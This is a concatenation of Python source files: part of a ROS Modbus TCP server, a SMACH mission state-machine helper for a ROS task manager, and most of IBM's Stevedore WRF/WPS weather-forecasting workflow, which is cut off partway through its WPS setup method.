self.context = ModbusServerContext(slaves=self.store, single=True)
self.identity = ModbusDeviceIdentification()
self.identity.VendorName = 'pymodbus'
self.identity.VendorUrl = 'http://github.com/bashwork/pymodbus/'
self.identity.ProductName = 'pymodbus Server'
self.identity.ModelName = 'pymodbus Server'
self.identity.MajorMinorRevision = '1.0'
self.server = ModbusTcpServer(context=self.context,
framer=None, identity=self.identity, address=(address, port))
def start(self):
rospy.loginfo("Start Modbus Server")
t = Thread(target=self.__start_server)
t.start()
def __start_server(self):
self.discrete_input.start_ros_subscribers()
self.input_register.start_ros_subscribers()
self.server.serve_forever()
def stop(self):
rospy.loginfo("Stop Modbus Server")
self.discrete_input.stop_ros_subscribers()
self.input_register.stop_ros_subscribers()
rospy.sleep(0.1)
self.server.server_close()
self.server.shutdown()
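
# Minimal usage sketch (illustrative, not part of the original module). Assumes a ROS
# master is running and the niryo_one_modbus data blocks are importable; the node name
# and port below are arbitrary example values.
if __name__ == '__main__':
    rospy.init_node('modbus_server_example')
    server = ModbusServer('0.0.0.0', 5020)
    server.start()
    rospy.on_shutdown(server.stop)
    rospy.spin()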
|
TaskSmach.py
|
import roslib; roslib.load_manifest('task_manager_lib')
from task_manager_lib.TaskClient import *
import smach
import smach_ros
import signal
import sys
import threading
class MissionFailed(smach.State):
def __init__(self):
smach.State.__init__(self,
outcomes=['MISSION_FAILED'])
class MissionCompleted(smach.State):
def __init__(self):
smach.State.__init__(self,
outcomes=['MISSION_COMPLETED'])
class TaskState(smach.State):
def __init__(self,mi,tc,name,**params):
smach.State.__init__(self,
outcomes=['TASK_COMPLETED','TASK_INTERRUPTED',
'TASK_FAILED','TASK_TIMEOUT','MISSION_COMPLETED'])
self.mi = mi
self.tc = tc
self.name = name
self.params = params
self.id = None
def execute(self, userdata):
if self.mi.is_shutdown():
return 'MISSION_COMPLETED'
# rospy.loginfo('Executing state '+self.name)
try:
self.id = self.tc.tasklist[self.name].start(**self.params)
self.tc.waitTask(self.id)
return 'TASK_COMPLETED'
except TaskConditionException:
return 'TASK_INTERRUPTED'
except TaskException, e:
if e.status == TaskStatus.TASK_TIMEOUT:
return 'TASK_TIMEOUT'
elif e.status == TaskStatus.TASK_INTERRUPTED:
return 'TASK_INTERRUPTED'
return 'TASK_FAILED'
def request_preempt(self):
if self.id:
# print "Preempting task %s:%d"%(self.name,self.id)
self.tc.stopTask(self.id)
class MissionStateMachine:
def __init__(self,tc=None):
self.shutdown_requested = False
self.pseudo_states={}
server_node = rospy.get_param("~server","/turtlesim_tasks")
default_period = rospy.get_param("~period",0.2)
if tc:
self.tc = tc
else:
self.tc = TaskClient(server_node,default_period)
# self.tc.verbose = 2
def is_shutdown(self):
return self.shutdown_requested
def createStateMachine(self):
return smach.StateMachine(outcomes=['TASK_COMPLETED','TASK_INTERRUPTED',
'TASK_FAILED','TASK_TIMEOUT','MISSION_COMPLETED'])
def createSequence(self):
return smach.Sequence(outcomes=['TASK_COMPLETED','TASK_INTERRUPTED',
'TASK_FAILED','TASK_TIMEOUT','MISSION_COMPLETED'],
connector_outcome='TASK_COMPLETED')
class concurrent_outcome_cb:
def __init__(self,mi,fg):
self.mi = mi
self.fg = fg
def __call__(self,states):
print states
if self.mi.is_shutdown():
return 'TASK_INTERRUPTED'
num_complete = sum([1 for x in states.values() if x == 'TASK_COMPLETED'])
if num_complete>=1:
return 'TASK_COMPLETED'
            return states[self.fg]
def createConcurrence(self,fg_state):
# Create the sub SMACH state machine
return smach.Concurrence(outcomes=['TASK_COMPLETED','TASK_INTERRUPTED',
'TASK_FAILED','TASK_TIMEOUT','MISSION_COMPLETED'], default_outcome='TASK_FAILED',
outcome_cb = self.concurrent_outcome_cb(self,fg_state),
child_termination_cb=lambda x:True)
class TaskEpsilon(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['TASK_COMPLETED','TASK_FAILED'])
def execute(self, userdata):
return 'TASK_COMPLETED'
def epsilon_task(self,label=None,transitions=None):
if not label:
label=self.getLabel("Epsilon")
if transitions:
smach.Sequence.add(label, self.TaskEpsilon(),transitions)
else:
smach.Sequence.add(label, self.TaskEpsilon())
return label
def getLabel(self,name):
state_name = "__"+name+"_0"
if name in self.pseudo_states:
state_name = "__" + name + "_" + str(self.pseudo_states[name])
else:
self.pseudo_states[name] = 0
self.pseudo_states[name] += 1
return state_name
def task(self,name,**params):
params['foreground']=True
state_name = None
if 'label' in params:
state_name=params['label']
del params['label']
else:
state_name = self.getLabel(name)
T=params['transitions']
del params['transitions']
smach.StateMachine.add(state_name, TaskState(self,self.tc,name,**params),T)
return state_name
def seq_task(self,name,**params):
state_name = None
params['foreground']=True
if 'label' in params:
state_name=params['label']
del params['label']
else:
state_name = self.getLabel(name)
if 'transitions' in params:
T=params['transitions']
del params['transitions']
smach.Sequence.add(state_name, TaskState(self,self.tc,name,**params),T)
else:
smach.Sequence.add(state_name, TaskState(self,self.tc,name,**params))
return state_name
def concurrent_task(self,name,**params):
state_name = self.getLabel(name)
foreground = params['foreground'] # This must be defined
if 'label' in params:
state_name=params['label']
del params['label']
smach.Concurrence.add(state_name, TaskState(self,self.tc,name,**params))
return state_name
class signal_handler:
def __init__(self,mi,sm):
self.mi = mi
self.sm = sm
def __call__(self,signal,frame):
# print("Signal %s detected" % str(signal))
self.mi.shutdown_requested = True
self.sm.request_preempt()
def run(self,sm):
self.shutdown_requested = False
sis = smach_ros.IntrospectionServer('mission_state_machine', sm, '/SM')
sis.start()
# Execute SMACH tree in a separate thread so that we can ctrl-c the script
signal.signal(signal.SIGINT, self.signal_handler(self,sm))
smach_thread = threading.Thread(target = sm.execute)
smach_thread.start()
while sm.is_running():
rospy.rostime.wallsleep(0.5)
sis.stop()
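
# Minimal usage sketch (illustrative, not part of the original module). Assumes a ROS
# master and a task server (e.g. /turtlesim_tasks) exposing a task named "Wait"; the
# task name and its "duration" parameter are illustrative only.
if __name__ == '__main__':
    rospy.init_node('mission_state_machine_example')
    mi = MissionStateMachine()
    sm = mi.createStateMachine()
    with sm:
        mi.task("Wait", duration=1.0, transitions={
            'TASK_COMPLETED': 'MISSION_COMPLETED',
            'TASK_INTERRUPTED': 'TASK_INTERRUPTED',
            'TASK_FAILED': 'TASK_FAILED',
            'TASK_TIMEOUT': 'TASK_TIMEOUT',
            'MISSION_COMPLETED': 'MISSION_COMPLETED'})
    mi.run(sm)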
|
Stevedore.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
IBM Containerized Forecasting Workflow
DESCRIPTION
WPS and WRF workflow for weather simulation.
AUTHOR
Timothy Lynar <timlynar@au1.ibm.com>, IBM Research, Melbourne, Australia
Frank Suits <frankst@au1.ibm.com>, IBM Research, Melbourne, Australia; Dublin, Ireland; Yorktown, USA
Beat Buesser <beat.buesser@ie.ibm.com>, IBM Research, Dublin, Ireland
NOTICE
Licensed Materials - Property of IBM
"Restricted Materials of IBM"
Copyright IBM Corp. 2017 ALL RIGHTS RESERVED
US GOVERNMENT USERS RESTRICTED RIGHTS - USE, DUPLICATION OR DISCLOSURE
RESTRICTED BY GSA ADP SCHEDULE CONTRACT WITH IBM CORP.
THE SOURCE CODE FOR THIS PROGRAM IS NOT PUBLISHED OR OTHERWISE DIVESTED OF
ITS TRADE SECRETS, IRRESPECTIVE OF WHAT HAS BEEN DEPOSITED WITH
THE U. S. COPYRIGHT OFFICE. IBM GRANTS LIMITED PERMISSION TO LICENSEES TO
MAKE HARDCOPY OR OTHER REPRODUCTIONS OF ANY MACHINE- READABLE DOCUMENTATION,
PROVIDED THAT EACH SUCH REPRODUCTION SHALL CARRY THE IBM COPYRIGHT NOTICES
AND THAT USE OF THE REPRODUCTION SHALL BE GOVERNED BY THE TERMS AND
CONDITIONS SPECIFIED BY IBM IN THE LICENSED PROGRAM SPECIFICATIONS. ANY
REPRODUCTION OR USE BEYOND THE LIMITED PERMISSION GRANTED HEREIN SHALL BE A
BREACH OF THE LICENSE AGREEMENT AND AN INFRINGEMENT OF THE APPLICABLE
COPYRIGHTS.
VERSION
o1.8
"""
from datetime import datetime, timedelta
from math import pi, cos
import os
import logging
from multiprocessing import Process, Queue, cpu_count
import shutil
import subprocess
import pytz
from netCDF4 import Dataset
from inputdataset import InputDataSet
from datasets_aux import *
from datasets_fcst import *
from datasets_hist import *
from datasets_sst import *
import util
class Stevedore(object):
'''
IBM Containerized Forecasting Workflow - WPS and WRF workflow for weather simulations.
'''
#Log level for items printed to the screen.
SCREEN_LOG_LEVEL = logging.INFO
#Number of workers to use when downloading data. When using RDA I suggest you set this to 1.
DOWNLOAD_WORKERS = 1
#Max number of domains supported by namelist instrumentation
MAXINSTRUMENTEDDOMAINS = 4
#Seconds in an hour
SEC_IN_HOUR = 3600
    #The default dataset. If no dataset is added this will be used.
DEFAULT_DS = "GFS"
#The default history interval aka the time between output files in minutes.
DEFAULT_HIST_INT = 60
def __init__(self, datetimeStart, forecastLength, latitude, longitude, ncores=4, ndomains=3, timestep=10,
gridratio=3, gridspacinginner=1.5, ngridew=100, ngridns=100, nvertlevels=40, phys_mp=17, phys_ralw=4,
phys_rasw=4, phys_cu=1, phys_pbl=1, phys_sfcc=1, phys_sfc=2, phys_urb=0, wps_map_proj='lambert', runshort=0,
auxhist7=False, auxhist2=False, feedback=False, adaptivets=False, projectdir='default', norunwrf=False, is_analysis=False,
altftpserver=None, initialConditions=['GFS'], boundaryConditions=['GFS'], inputData=[], tsfile=None, history_interval=60):
'''
Constructor
'''
#IBM-NOTICE
self.notice = "IBM Containerized Forecasting Workflow \n Licensed Materials - Property of IBM \n Copyright IBM Corp. 2017 ALL RIGHTS RESERVED \n "
print self.notice
#End IBM Notice.
        #Import the root path of this DeepThunder installation from the environment variable DEEPTHUNDER_ROOT
self.directory_root_input = os.environ.get('DEEPTHUNDER_ROOT')
#If the root path of the DeepThunder installation is not set then guess that it will be /opt/deepthunder
if self.directory_root_input is None:
self.directory_root_input = '/opt/deepthunder'
        #Specify the directory where the InputDataSets are stored after download
self.directory_root_inputDataSets = self.directory_root_input+'/data/inputDataSets'
#Specify the directory where the DeepThunder run directory will be created
self.directory_root_run = self.directory_root_input+'/data/domains'
        #Specify the directory containing the databases of terrestrial information
self.directory_root_geog = self.directory_root_input+'/data/Terrestrial_Input_Data'
        #Specify the number of cores available to execute Real.exe and WRF.exe.
#They will run in parallel with this number
self.numberCores = ncores
#Define a list that will contain the domains to be processed
self.domains = range(1, ndomains+1)
#Specify the number of domains in this run
self.maxdom = ndomains
#Set run length in hours for WPS
self.runlength_wps = None
#Set end time / date for WPS
self.datetimeEndUTC_wps = None
#Grid spacing dx
#lambert or any other projection except lat-lon.
        #Converts gridspacinginner from km to metres and scales it up to the outermost domain.
        #self.dx is the value for the outermost domain = domain 1.
        #outerdx = innerdx_km * 1000 * gridratio**(ndomains-1)
self.dx = (gridspacinginner*1000*(gridratio**(ndomains-1)))
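        #Worked example (illustrative): with gridspacinginner=1.5 km, gridratio=3 and
        #ndomains=3, dx = 1.5*1000*3**2 = 13500 m for the outermost domain.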
self.wpsdx = self.dx
#Grid spacing dy (assume it is the same as dx.)
self.dy = self.dx
self.wpsdy = self.dy
#Parent grid ratio
self.parent_grid_ratio = gridratio
#Number of vertical levels
self.num_vertical_levels = nvertlevels
        #Define a list that will contain all domains, not just those to be processed,
        #in descending order
self.idomains = range(self.MAXINSTRUMENTEDDOMAINS, 0, -1)
#Physics options
#Micro Physics vairables
self.phys_mp_val = phys_mp
#Radiation Long wave Physics (ra_lw)
self.phys_ralw_val = phys_ralw
#Radiation Short wave Physics (ra_sw)
self.phys_rasw_val = phys_rasw
#Cumulus scheme - populate as list
self.phys_cu_val = util.convert_to_list(phys_cu, self.maxdom)
#Planetary boundary layer (PBL)
self.phys_pbl_val = phys_pbl
#Surface Layer Options (sf_sfclay_physics)
self.phys_sfcc_val = phys_sfcc
#Land Surface Options (sf_surface_physics)
self.phys_sfc_val = phys_sfc
#Urban Surface Options (sf_urban_physics)
self.phys_urb_val = phys_urb
#END physics options
#interval_seconds
self.sstintervalseconds = 0
self.maxintervalseconds = 0
self.WPSintervalseconds = None
#Set the number of grid points in each domain
self.domain_dims_nx = util.convert_to_list(ngridew, self.maxdom)
self.domain_dims_ny = util.convert_to_list(ngridns, self.maxdom)
#Set the history_interval
self.domain_history_interval = util.convert_to_list(history_interval, self.maxdom)
#Store in a list the sizes of the elements of the numerical grid of each domain in longitude direction
self.domain_dims_dx = []
#Store in a list the sizes of the elements of the numerical grid of each domain in latitude direction
self.domain_dims_dy = []
#WPS map projection
self.wps_map_proj = wps_map_proj
#Dictionary to store the required input data sets
self.inputDataSets = {}
#Dataset for initial conditions
self.initialConditions = initialConditions
#Dataset for boundary conditions
self.boundaryConditions = boundaryConditions
#Timestep used for forecast
self.timeStepForecast = timestep
#Load the inputDataSets and populate dictionary key = name i.e 'GFS' value = inputDataSet
#make sure that inputData = self.initialConditions + self.boundaryConditions
#Adding initialConditions to inputData.
for ds in self.initialConditions:
inputData.append(ds)
#Adding boundaryConditions to inputData.
for ds in self.boundaryConditions:
inputData.append(ds)
#After adding both initialConditions and boundaryConditions
#if inputData is still of zero size then add DEFAULT_DS
if not inputData:
print 'Added default dataset '+ str(self.DEFAULT_DS)
inputData.append(self.DEFAULT_DS)
#Adds all datasets to the dictionary inputDataSets
for ds in inputData:
print 'Add dataset '+ str(ds)
self.inputDataSets[str(ds)] = None
#Store all input files as inputDataSet
self.inputfiles = []
#Store forecastLength in hours
self.forecastLength = forecastLength
#Run short is the number of hours that you wish to prep for but not execute with wrf.
#wrf run time is set to forecastLength - runshort
self.runshort = runshort
#Store latitude of centre coordinates
self.latitude = util.convert_to_list(latitude, self.maxdom)
#Store longitude of centre coordinates
self.longitude = util.convert_to_list(longitude, self.maxdom)
#aux hist variables (true for turn on false for turn off)
self.auxhist7 = auxhist7
self.auxhist2 = auxhist2
#Feedback on or off
self.feedback = feedback
#Turn on or off adaptive time Steps
self.adaptivets = adaptivets
#Set the project directory; output data will be found in /data/domains/$projectDir/
self.project_dir = projectdir
#Set a flag controlling whether wrf is run: if norunwrf is False, wrf will be run
self.norunwrf = norunwrf
#Set flag for this being a reanalysis - this affects how the SST is used.
#Use this option if you need to do a long run historical simulation.
self.is_analysis = is_analysis
#Alternate FTP server - download all data from this server if set.
self.alt_ftp_server_url = altftpserver
#Define a pytz time zone object for Coordinated Universal Time (UTC)
utc = pytz.utc
#Create a datetime object for the forecast start time in UTC
self.datetimeStartUTC = datetime(year=datetimeStart.year, month=datetimeStart.month,
day=datetimeStart.day, hour=datetimeStart.hour, tzinfo=utc)
#Create a datetime object for the forecast end time in UTC
#self.datetimeEndUTC = self.datetimeStartUTC + timedelta(days=delta[0]) + timedelta(hours=delta[1])
self.datetimeEndUTC = self.datetimeStartUTC+timedelta(hours=self.forecastLength)
#Get the SST date (previous day) #will be updated later
self.datetimeSST = self.datetimeStartUTC-timedelta(days=1)
#Time series file
self.tsfile = tsfile
#Set the directory structure of the Stevedore installation assuming Stevedore has been built with the Dockerfile provided
self.directory_WPS_input = self.directory_root_input+'/externalDependencies/src/WPS'
self.directory_WRF_input = self.directory_root_input+'/externalDependencies/WRF'
self.directory_IBM_input = self.directory_root_input+'/externalDependencies/src/IBM'
self.directory_PreProcessing_input = self.directory_root_input+'/PreProcessing'
#Set the sub-directories of the DeepThunder run directory
self.directory_run = self.directory_root_run+'/'+str(self.project_dir)+'/'+str(self.datetimeStartUTC.year)+'-'+\
str(self.datetimeStartUTC.month).zfill(2)+'-'+str(self.datetimeStartUTC.day).zfill(2)+'_'+\
str(self.datetimeStartUTC.hour).zfill(2)
self.directory_data = self.directory_root_input+'/data'
self.directory_PreProcessing_run = self.directory_run+'/PreProcessing'
self.directory_wrf_run = self.directory_run+'/WRF'
#LOGFILE
self.logfile = self.directory_run+'/IBM-CFW-logfile.log'
#Create lists to store minimum and maximum latitude and longitude of all the domains, in the same order as self.domains
#Note this bounding box is only used for data acquisition with GFSsubset.
self.lat_min = []
self.lat_max = []
self.lon_min = []
self.lon_max = []
#Calculate bounding box for each domain and dx and dy
for domain in self.domains:
#calculate dx and dy per domain in metres
domspace = round(gridspacinginner*1000*gridratio**(self.maxdom-domain))
self.domain_dims_dx.append(domspace)
self.domain_dims_dy.append(domspace)
self.lat_min.append(round(self.latitude[domain-1]-1.5*self.domain_dims_ny[domain-1]*self.domain_dims_dy[domain-1] / 2.0 / 1000.0 / 111.325, 2))
self.lat_max.append(round(self.latitude[domain-1]+1.5*self.domain_dims_ny[domain-1]*self.domain_dims_dy[domain-1] / 2.0 / 1000.0 / 111.325, 2))
self.lon_min.append(round(self.longitude[domain-1]-1.5*self.domain_dims_nx[domain-1]*self.domain_dims_dx[domain-1] / 2.0 / 1000.0 / (cos(self.latitude[domain-1]/360.0*(2.0*pi)) * 111.325), 2))
self.lon_max.append(round(self.longitude[domain-1]+1.5*self.domain_dims_nx[domain-1]*self.domain_dims_dx[domain-1] / 2.0 / 1000.0 / (cos(self.latitude[domain-1]/360.0*(2.0*pi)) * 111.325), 2))
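#Illustration of the bounding-box formula above (hypothetical values): with ny = 100 points and dy = 9000 m,
#the half-height is 1.5 * 100 * 9000 / 2 / 1000 / 111.325 ~= 6.06 degrees, i.e. a 1.5x margin around the
#domain, using ~111.325 km per degree of latitude (scaled by cos(latitude) for longitude).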
#Create the top-level run directory if it does not exist
if not os.path.exists(self.directory_run):
os.makedirs(self.directory_run)
#Initialise the OpenDeepThunder log-file
if os.path.exists(self.logfile):
os.remove(self.logfile)
#Create the logging instance for this DeepThunder object
logging.basicConfig(filename=self.logfile, level=logging.DEBUG,
format='%(asctime)s: %(message)s', datefmt='%d/%m/%Y %I:%M:%S %p')
console = logging.StreamHandler()
console.setLevel(self.SCREEN_LOG_LEVEL)
formatter = logging.Formatter('%(asctime)s: %(message)s')
console.setFormatter(formatter)
logging.getLogger().addHandler(console)
logging.info('Construct IBM Containerized Forecasting Workflow object.')
#If the environment variable has not been set fire off a warning.
if self.directory_root_input is None:
logging.warning("The environment variable DEEPTHUNDER_ROOT has not been set so /opt/deepthunder will be used in its place")
logging.info("Domain. "+ str(self.domains)+ " "+str(self.latitude)+" "+str(self.longitude)+ " " + str(self.domain_dims_ny) + " " + str(self.domain_dims_dx))
def check_input_data(self):
"""
Determines the file names of required input data and downloads it.
"""
#Log entering check_input_data
logging.info('check_input_data: Download input data.')
#Create the directory to store the data we download if it does not already exist.
if not os.path.exists(self.directory_root_inputDataSets):
os.mkdir(self.directory_root_inputDataSets)
#Set up multiprocessing
workers = self.DOWNLOAD_WORKERS
work_queue = Queue()
done_queue = Queue()
processes = []
baddata = []
for ids in self.inputDataSets:
try:
idsMethodName = eval('InputDataSet'+str(ids))
logging.debug('check_input_data: Download input data. with '+ str(idsMethodName))
inputDataSet = idsMethodName(self.datetimeStartUTC, 0, self.directory_root_inputDataSets, is_analysis=self.is_analysis)
intervalhours = inputDataSet.intervalseconds/self.SEC_IN_HOUR
#Set the intervalseconds to the lowest of the datasets.
if inputDataSet.intervalseconds > self.maxintervalseconds:
self.maxintervalseconds = inputDataSet.intervalseconds
#If the dataset is an SST and we are not running an analysis then update the SST date
if inputDataSet.is_sst and not self.is_analysis:
try:
self.datetimeSST = inputDataSet.getSSTDate()
logging.debug('SST date set to '+str(self.datetimeSST))
except:
logging.error('Error malformed InputDataSet. SSTDate will be set to default -1 day')
#Store input dataset object also as attribute of the DeepThunder object
self.inputDataSets[ids] = (inputDataSet)
#Loop over (forecast length / interval between files in hours) + 1 time steps.
for hour_steps in range((self.forecastLength/intervalhours)+1):
#Create a input dataset object
#note we pass the hour offset rather than a new date, since how the date is incremented depends on the dataset.
inputDataSet = idsMethodName(self.datetimeStartUTC, hour_steps*intervalhours,
self.directory_root_inputDataSets, lon_min=self.lon_min[0],
lon_max=self.lon_max[0], lat_min=self.lat_min[0], lat_max=self.lat_max[0], is_analysis=self.is_analysis)
#Add the input dataset object to the download work queue
work_queue.put(inputDataSet)
#Also store the input dataset object in the list of input files
self.inputfiles.append(inputDataSet)
#Log information to DeepThunder log-file
logging.debug(str(ids)+ ' filename: '+ inputDataSet.get_filename())
except:
logging.error('ERROR: ' + str(ids)+ ' may not be a recognised dataset. It will not be used.')
baddata.append(ids)
#Delete all the bad datasets to prevent future errors.
for ids in baddata:
logging.error('Removing : ' + str(ids)+ ' from datasets')
del self.inputDataSets[ids]
#Work on work_queue
for worker_id in range(workers):
try:
#
logging.debug('check_input_data: starting worker ' + str(worker_id))
process = Process(target=self._worker_download_input_data, args=(work_queue, done_queue))
process.start()
processes.append(process)
work_queue.put('STOP')
except:
logging.error("ERROR problem processing the queue")
#Wait for it all to finish downloading.
for process in processes:
process.join()
#log that we are all done.
logging.info('check_input_data: data downloaded.')
def _worker_download_input_data(self, work_queue, done_queue):
"""
Downloads the file(s) defined by and inputDataSet object
stored in the work_queue.
"""
logging.debug('_worker_download_input_data')
#Get next object waiting in the work_queue
for inputDataSet in iter(work_queue.get, 'STOP'):
#if alt_ftp_server_url is set then pass it on.
if self.alt_ftp_server_url != None:
logging.info('_worker_download_input_data Setting alternate ftp server as '+str(self.alt_ftp_server_url)+ 'for '+ str(inputDataSet.name))
inputDataSet.alt_server_url = str(self.alt_ftp_server_url)
#Download the input data set file
inputDataSet.download()
def run_preprocessing(self):
"""
Pre-processes the input data for a WRF simulation. It calls functions
that execute the WRF Pre-processing System and real.exe.
"""
#Log information to DeepThunder log-file
logging.info('Run pre-processing ...')
#Delete the run directory of the pre-processing if it exists
if os.path.exists(self.directory_PreProcessing_run):
shutil.rmtree(self.directory_PreProcessing_run)
#Round up the end time for WPS based on the grib file frequency (even if the forecast length is shorter than that frequency)
#Example: 1 hour run = forecast length, but grib file every 3 hourly or 6 hourly
#Get the number of full days and remaining hours.
delta = divmod(self.forecastLength, 24)
thours = timedelta(hours=delta[1])
#Take whichever is larger: the remainder of hours (in seconds) or self.maxintervalseconds. Note: self.maxintervalseconds is the maximum of intervalseconds over all datasets used.
maxinterval = max(thours.seconds, self.maxintervalseconds)
#Set these interval hours as maxintervalhours
maxintervalhours = maxinterval/self.SEC_IN_HOUR
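#Hypothetical example: forecastLength = 25 h with 6-hourly input files (maxintervalseconds = 21600)
#gives delta = (1, 1), thours.seconds = 3600, maxinterval = 21600 and maxintervalhours = 6.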
#NOTE: TL. Need to make this more elegant
#Set the end-time by using maxintervalhours
self.datetimeEndUTC_wps = self.datetimeStartUTC+timedelta(days=delta[0])+timedelta(hours=maxintervalhours)
if self.datetimeEndUTC_wps > self.datetimeEndUTC:
self.datetimeEndUTC_wps = self.datetimeEndUTC
rwps = self.datetimeEndUTC_wps - self.datetimeStartUTC # Input file frequency based run length for ungrib, metgrid and real
rwps_fdays = rwps.days * 24 # hours
rwps_fsec = rwps.seconds / self.SEC_IN_HOUR # hours
self.runlength_wps = rwps_fdays+rwps_fsec
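#Continuing the hypothetical example above: datetimeEndUTC_wps is capped at start + 25 h, so
#rwps = 25 h and runlength_wps = 1*24 + 3600/3600 = 25 hours.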
#If input data set for initial and boundary conditions are the same
if self.initialConditions == self.boundaryConditions:
#Run the WRF Pre-Processing System for the initial and boundary conditions
self._run_WPS(self.directory_PreProcessing_run+'/WPS_boundary',
self.inputDataSets, self.datetimeEndUTC_wps)
#Run the real.exe for the initial and boundary conditions
self._run_Real(self.directory_PreProcessing_run+'/Real_boundary',
self.directory_PreProcessing_run+'/WPS_boundary',
self.boundaryConditions, self.datetimeEndUTC_wps)
#If input data set for initial and boundary conditions are different
else:
#Create a dummy copy of the input data sets
dsUngrib = self.inputDataSets.copy()
#Remove the input data set for the initial conditions
for ids in self.initialConditions:
dsUngrib.pop(ids, None)
#Run the WRF Pre-processing System for the boundary conditions
self._run_WPS(self.directory_PreProcessing_run+'/WPS_boundary',
dsUngrib, self.datetimeEndUTC_wps)
#Run the real.exe for the boundary conditions
self._run_Real(self.directory_PreProcessing_run+'/Real_boundary',
self.directory_PreProcessing_run+'/WPS_boundary',
self.boundaryConditions, self.datetimeEndUTC_wps)
#Create a dummy copy of the input data sets
dsUngrib = self.inputDataSets.copy()
#Remove the input data set for the boundary conditions
for ids in self.boundaryConditions:
dsUngrib.pop(ids, None)
#Run the WRF Pre-processing System for the initial conditions
self._run_WPS(self.directory_PreProcessing_run+'/WPS_initial',
dsUngrib, self.datetimeStartUTC)
#Run the real.exe for the initial conditions
self._run_Real(self.directory_PreProcessing_run+'/Real_initial',
self.directory_PreProcessing_run+'/WPS_initial',
self.initialConditions, self.datetimeStartUTC)
def _replace_location_strings(self, fname):
"""
Replaces all the strings in the namelist to do with the location of the domain.
"""
#Go through the datasets and find the one with the smallest interval
self.WPSintervalseconds = None
for ids in self.inputDataSets.iterkeys():
idso = self.inputDataSets[ids]
if idso.intervalseconds < self.WPSintervalseconds or self.WPSintervalseconds is None:
self.WPSintervalseconds = idso.intervalseconds
#Replace the place-holders in the namelist file with the properties of this DeepThunder object
util.replace_string_in_file(fname, 'DT_LATITUDE_DT', str(self.latitude[0]))
util.replace_string_in_file(fname, 'DT_LONGITUDE_DT', str(self.longitude[0]))
util.replace_string_in_file(fname, 'DT_GEOG_DATA_PATH_DT', str(self.directory_root_geog))
util.replace_string_in_file(fname, 'DT_MAX_DOM_DT', str(max(self.domains)))
dx = self.wpsdx
dy = self.wpsdy
if dx == 0:
dx = self.domain_dims_dx[0]
if dy == 0:
dy = self.domain_dims_dy[0]
#If we use lat-lon then dx and dy will be in degrees.
if self.wps_map_proj == 'lat-lon':
#Convert dx and dy from metres to degrees.
#note self.dx and self.dy are distances in m;
#dxkm and dykm are in km
dxkm = self.dx / 1000
dykm = self.dy / 1000
# km per deg at the equator.
kmperdeg = 111.1774799
dx_deg = (dxkm / kmperdeg)
dy_deg = (dykm / kmperdeg)
#set the dx
dx = dx_deg
dy = dy_deg
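#Hypothetical example: self.dx = 9000 m gives dxkm = 9 and dx_deg = 9 / 111.1774799 ~= 0.081 degrees.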
util.replace_string_in_file(fname, 'DT_DX_1_DT,', str(dx))
util.replace_string_in_file(fname, 'DT_DY_1_DT,', str(dy))
util.replace_string_in_file(fname, 'DT_PARENT_GRID_RATIO_DT', str(self.parent_grid_ratio))
util.replace_string_in_file(fname, 'DT_INTERVAL_SECONDS', str(self.WPSintervalseconds))
util.replace_string_in_file(fname, 'DT_WPS_MAP_PROJ_DT', str(self.wps_map_proj))
#TODO: TL This is not working. NOTE lon is not used.
# special handling for staggered domains with different centre lat/lon values
centered = (min(self.latitude) == max(self.latitude)) & (min(self.longitude) == max(self.longitude))
starti = [1]*len(self.domains)
startj = list(starti) #copy, so that startj does not alias starti
for i in range(1, len(self.domains)):
starti[i] = int(self.domain_dims_nx[i-1]*(1-1.0/self.parent_grid_ratio)/2+1)
startj[i] = int(self.domain_dims_ny[i-1]*(1-1.0/self.parent_grid_ratio)/2+1)
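#Illustration of the default (centred) placement above, with hypothetical values: parent nx = 100 and
#parent_grid_ratio = 3 give starti = int(100 * (1 - 1.0/3) / 2 + 1) = int(34.33) = 34.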
#Apply offset of domain relative to parent, based on relative lat/lon
if not centered:
lat = self.latitude[0]
lon = self.longitude[0]
coslat = cos(lat*pi/180)
kmperdeg = 111.2 # this is not meant to be exact
for i in range(1, len(self.domains)):
dx = self.domain_dims_dx[i]
dy = self.domain_dims_dy[i]
#This calculates the difference in km between the prior domain centre and the current domain centre
shiftx = ((self.longitude[i]-self.longitude[i-1])*coslat*kmperdeg)
shifty = ((self.latitude[i]-self.latitude[i-1])*kmperdeg)
#This should point to the lower left hand corner of this domain in its parent domain coordinates.
#this gives us the middle. Now we need to subtract its length and width in parent points.
#starti[i] = starti[i-1] + (round(shiftx/(dx/1000))) * -1
#startj[i] = startj[i-1] + (round(shifty/(dy/1000))) * -1
pointsx = (round(shiftx/(dx/1000)))
pointsy = (round(shifty/(dy/1000)))
#Calculate the bottom left based on the shift.
#points to move x = (parent width - current width) /2 + pointsx
#points to move y = (parent height - current height) /2 + pointsy
starti[i] = starti[i-1]+((self.domain_dims_nx[i-1]-(self.domain_dims_nx[i]/dx))/2)+pointsx
startj[i] = startj[i-1]+((self.domain_dims_ny[i-1]-(self.domain_dims_ny[i]/dx))/2)+pointsy
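#Illustration of the arithmetic as coded (hypothetical values): a nest centre 0.5 degrees east of its parent
#centre at ~30 degrees latitude gives shiftx ~= 0.5 * cos(30 deg) * 111.2 ~= 48.1 km; with dx = 3000 m
#(dx/1000 = 3 km) that is pointsx = round(48.1 / 3) = 16 points of eastward offset.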
#Set values for the actual domain range in use
for i in self.domains:
util.replace_string_in_file(fname, 'DT_WE_COUNT_%d_DT'%i, str(self.domain_dims_nx[i-1]))
util.replace_string_in_file(fname, 'DT_SN_COUNT_%d_DT'%i, str(self.domain_dims_ny[i-1]))
if i > 1:
nstarti = int(starti[i-1])
nstartj = int(startj[i-1])
util.replace_string_in_file(fname, 'DT_I_PARENT_START_%d_DT'%i, str(nstarti))
util.replace_string_in_file(fname, 'DT_J_PARENT_START_%d_DT'%i, str(nstartj))
#Fill the remaining non-used domains with numbers - to replace the text template values
for i in self.idomains:
if i > max(self.domains):
util.replace_string_in_file(fname, 'DT_WE_COUNT_%d_DT'%i, str(0))
util.replace_string_in_file(fname, 'DT_SN_COUNT_%d_DT'%i, str(0))
util.replace_string_in_file(fname, 'DT_I_PARENT_START_%d_DT'%i, str(0))
util.replace_string_in_file(fname, 'DT_J_PARENT_START_%d_DT'%i, str(0))
def _run_WPS(self, directory_WPS_run, dsUngrib, datetimeEndUTC):
"""
Prepares and runs the WRF Pre-processing System (WPS).
"""
#Log information to DeepThunder log-file
logging.info('_run_WPS Run WPS. Entered')
#Check if the terrestrial input data is at self.directory_root_geog
if os.path.exists(self.directory_root_geog):
logging.info('_run_WPS geog data directory exists')
